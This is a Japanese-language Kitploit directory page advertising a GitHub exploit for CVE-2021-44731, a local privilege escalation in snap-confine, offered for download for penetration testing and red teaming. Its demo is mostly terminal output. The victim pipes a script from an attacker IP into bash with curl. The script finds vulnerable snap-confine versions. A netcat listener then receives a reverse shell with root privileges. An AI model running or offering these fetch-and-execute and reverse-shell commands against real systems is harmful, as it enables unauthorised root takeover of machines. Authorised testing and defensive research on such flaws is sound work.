Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-44731-snap-confine-SUID — CVE-2021-44731 に対するローカル権限昇格エクスプロイト | Kitploit
ツール/GitHubGitHub/deeexcee-io/cve-2021-44731-snap-confine-suid
特権昇格脆弱性分析エクスプロイトポストエクスプロイトペネトレーションテストレッドチーミング
GitHubdeeexcee-io/cve-2021-44731-snap-confine-suid

CVE-2021-44731-snap-confine-SUID

CVE-2021-44731 に対するローカル権限昇格エクスプロイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
423年前未レビュー

CVE-2021-44731-snap-confine-SUID

CVE-2021-44731 のローカル権限昇格エクスプロイト、snap-confine 2.54.2 以下

この脆弱性を発見し、詳細なエクスプロイトを提供してくれた Qualys に感謝します。

https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt

簡易的な snap-confine LPE です。脆弱性のあるバージョンの snap-confine を検索し、見つかった場合はエクスプロイトを実行します。

ルートシェルを返します。netcat でキャッチしてください。

root@kitploit:~
$id
uid=1001(vulnchain) gid=1001(vulnchain) groups=1001(vulnchain)
$ curl http://10.8.0.134/snap_confine_LPE.sh | bash
curl http://10.8.0.134/snap_confine_LPE.sh | bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2073  100  2073    0     0  28397      0 --:--:-- --:--:-- --:--:-- 28013
Non-vulnerable version found: 2.54.3
Vulnerable version found: 2.44.3 at /usr/lib/snapd/snap-confine
Vulnerable version found: 2.44.3 at /home/vulnchain/snap-confine
Performing actions with a vulnerable version...
Chosen vulnerable version: 2.44.3

ルートシェル

root@kitploit:~
┌──(root㉿kali)-[~]
└─# nc -lvnp 4447    
listening on [any] 4447 ...
connect to [10.8.0.134] from (UNKNOWN) [10.10.111.136] 56050
bash: cannot set terminal process group (609): Inappropriate ioctl for device
bash: no job control in this shell
root@ip-10-10-10-14:/# id
id
uid=0(root) gid=0(root) groups=0(root),1001(vulnchain)
root@ip-10-10-10-14:/# 
ツールをダウンロード